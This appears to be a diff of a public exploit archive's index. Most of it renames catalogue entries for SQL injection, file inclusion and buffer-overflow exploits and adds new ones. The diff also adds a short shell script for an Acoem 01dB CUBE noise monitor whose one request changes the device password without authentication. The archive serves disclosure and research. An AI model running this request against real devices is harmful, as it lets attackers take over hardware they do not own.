12574,platforms/php/webapps/12574.txt,"Joomla! Component Module Camp26 Visitor Data 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0
|
||||
12574,platforms/php/webapps/12574.txt,"Joomla! Component 'mod_VisitorData' 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0
|
||||
12575,platforms/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,php,webapps,0
|
||||
12576,platforms/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,php,webapps,0
|
||||
12577,platforms/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,php,webapps,0
|
||||
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
|
||||
12579,platforms/php/webapps/12579.txt,"Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0
|
||||
12579,platforms/php/webapps/12579.txt,"Joomla! Component 'com_PHP' 0.1 - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0
|
||||
12580,platforms/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal / Listing",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
|
||||
|
@ -11494,50 +11494,50 @@ id,file,description,date,author,platform,type,port
|
|||
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0
|
||||
12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21
|
||||
12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
|
||||
12590,platforms/php/webapps/12590.txt,"Joomla! Component com_konsultasi - 'sid' SQL Injection",2010-05-13,c4uR,php,webapps,0
|
||||
12590,platforms/php/webapps/12590.txt,"Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0
|
||||
12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12592,platforms/php/webapps/12592.txt,"Joomla! Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0
|
||||
12592,platforms/php/webapps/12592.txt,"Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0
|
||||
12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0
|
||||
12594,platforms/php/webapps/12594.txt,"Joomla! Component Seber Cart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
|
||||
12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
|
||||
12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
|
||||
12595,platforms/php/webapps/12595.txt,"Joomla! Component 'com_dioneformwizard' - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
|
||||
12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
|
||||
12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
|
||||
12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0
|
||||
14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0
|
||||
12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12601,platforms/php/webapps/12601.txt,"Joomla! Component 'com_jejob' 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0
|
||||
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
|
||||
12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
|
||||
12607,platforms/php/webapps/12607.txt,"Joomla! Component 'com_jequoteform' - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
|
||||
12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0
|
||||
12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0
|
||||
12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0
|
||||
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
|
||||
12611,platforms/php/webapps/12611.txt,"Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
|
||||
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
|
||||
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
|
||||
12614,platforms/windows/remote/12614.txt,"Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0
|
||||
12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
|
||||
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
|
||||
12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0
|
||||
12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
|
||||
12618,platforms/php/webapps/12618.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
|
||||
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
|
||||
12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0
|
||||
12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local,0
|
||||
12623,platforms/php/webapps/12623.txt,"Joomla! Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0
|
||||
12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0
|
||||
12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0
|
||||
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
|
||||
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
|
||||
12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0
|
||||
12632,platforms/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0
|
||||
12633,platforms/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0
|
||||
12632,platforms/php/webapps/12632.txt,"Joomla! Component 'com_crowdsource' - SQL Injection",2010-05-17,ByEge,php,webapps,0
|
||||
12633,platforms/php/webapps/12633.txt,"Joomla! Component 'com_event' - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0
|
||||
12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0
|
||||
12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0
|
||||
12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps,0
|
||||
12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps,0
|
||||
12639,platforms/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0
|
||||
12639,platforms/php/webapps/12639.txt,"Joomla! Component 'com_event' - SQL Injection",2010-05-17,anonymous,php,webapps,0
|
||||
12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps,0
|
||||
12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0
|
||||
12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,"cp77fk4r ",php,webapps,0
|
||||
|
@ -11546,7 +11546,7 @@ id,file,description,date,author,platform,type,port
|
|||
12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0
|
||||
12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0
|
||||
12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0
|
||||
12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
|
||||
12648,platforms/php/webapps/12648.txt,"Joomla! Component 'com_packages' - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
|
||||
12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0
|
||||
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0
|
||||
12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)",2010-05-18,JMIT,netbsd_x86,dos,0
|
||||
|
@ -11620,7 +11620,7 @@ id,file,description,date,author,platform,type,port
|
|||
12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,php,webapps,0
|
||||
12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,php,webapps,0
|
||||
12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design - 'index2.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0
|
||||
12723,platforms/php/webapps/12723.py,"Joomla! Component com_qpersonel - SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0
|
||||
12723,platforms/php/webapps/12723.py,"Joomla! Component 'com_qpersonel' 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",php,webapps,0
|
||||
12724,platforms/php/webapps/12724.php,"WebAsys - Blind SQL Injection",2010-05-24,zsh.shell,php,webapps,0
|
||||
12725,platforms/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,php,webapps,0
|
||||
12726,platforms/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -14524,7 +14524,7 @@ id,file,description,date,author,platform,type,port
|
|||
16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
|
||||
16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
|
||||
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
|
||||
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
|
||||
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
|
||||
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
|
||||
|
@ -16307,7 +16307,7 @@ id,file,description,date,author,platform,type,port
|
|||
18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0
|
||||
18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
|
||||
18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0
|
||||
18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86) - Code Execution",2012-05-11,0in,windows,local,0
|
||||
18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0
|
||||
18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
|
||||
18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
|
||||
18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -19448,7 +19448,7 @@ id,file,description,date,author,platform,type,port
|
|||
22153,platforms/php/webapps/22153.pl,"Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection",2012-10-22,D35m0nd142,php,webapps,0
|
||||
22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0
|
||||
22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
|
||||
22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0
|
||||
22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection",2012-10-22,Cumi,php,webapps,0
|
||||
22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0
|
||||
22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
|
||||
22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -20918,7 +20918,7 @@ id,file,description,date,author,platform,type,port
|
|||
23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
|
||||
23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0
|
||||
23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0
|
||||
23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
|
||||
23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
|
||||
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
|
||||
23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0
|
||||
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
|
||||
|
@ -30581,7 +30581,7 @@ id,file,description,date,author,platform,type,port
|
|||
33880,platforms/windows/remote/33880.rb,"Cogent DataHub - Command Injection (Metasploit)",2014-06-25,Metasploit,windows,remote,0
|
||||
33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0
|
||||
33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
33998,platforms/php/webapps/33998.html,"Joomla! Component JoomlaTune JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
33998,platforms/php/webapps/33998.html,"Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote,0
|
||||
33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0
|
||||
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
|
||||
|
@ -30723,12 +30723,12 @@ id,file,description,date,author,platform,type,port
|
|||
34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0
|
||||
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0
|
||||
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0
|
||||
34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34003,platforms/php/webapps/34003.txt,"Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34004,platforms/php/webapps/34004.txt,"Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
|
||||
34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34008,platforms/php/webapps/34008.txt,"Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010
|
||||
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
|
||||
34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0
|
||||
|
@ -30739,7 +30739,7 @@ id,file,description,date,author,platform,type,port
|
|||
34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0
|
||||
34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
|
||||
34021,platforms/php/webapps/34021.txt,"Joomla! Component 'com_horses' - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
|
||||
34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0
|
||||
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
|
||||
34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,"ViRuSMaN ",php,webapps,0
|
||||
|
@ -36710,7 +36710,7 @@ id,file,description,date,author,platform,type,port
|
|||
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
|
||||
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection (2)",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
|
||||
40614,platforms/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
|
||||
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
|
||||
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
|
||||
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
|
||||
|
@ -36800,4 +36800,11 @@ id,file,description,date,author,platform,type,port
|
|||
40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0
|
||||
40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
|
||||
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
|
||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||
40719,platforms/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps,0
|
||||
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
|
||||
40721,platforms/windows/remote/40721.html,"Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084)",2016-11-07,Skylined,windows,remote,0
|
||||
40722,platforms/windows/dos/40722.html,"Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
|
||||
40723,platforms/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",php,webapps,0
|
||||
40724,platforms/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80
|
||||
40725,platforms/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps,0
|
||||
|
|
|
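--- a/platforms/hardware/remote/40720.sh
+++ b/platforms/hardware/remote/40720.sh
@@ -0,0 +1,37 @@
+#!/bin/sh
+#
+# Acoem 01dB CUBE Smart Noise Monitoring Terminal
+# Remote Password Change
+#
+# HW version: LIS001A
+# Application FW: 2.34
+# Metrology FW: 2.10
+# Modem FW: 12.00.005 / 08.01.108
+#
+#
+# Copyright 2016 (c) Todor Donev
+# <todor.donev at gmail.com>
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# Thanks to Maya Hristova that support me.
+
+[todor@adamantium ~]$ GET "http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>"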
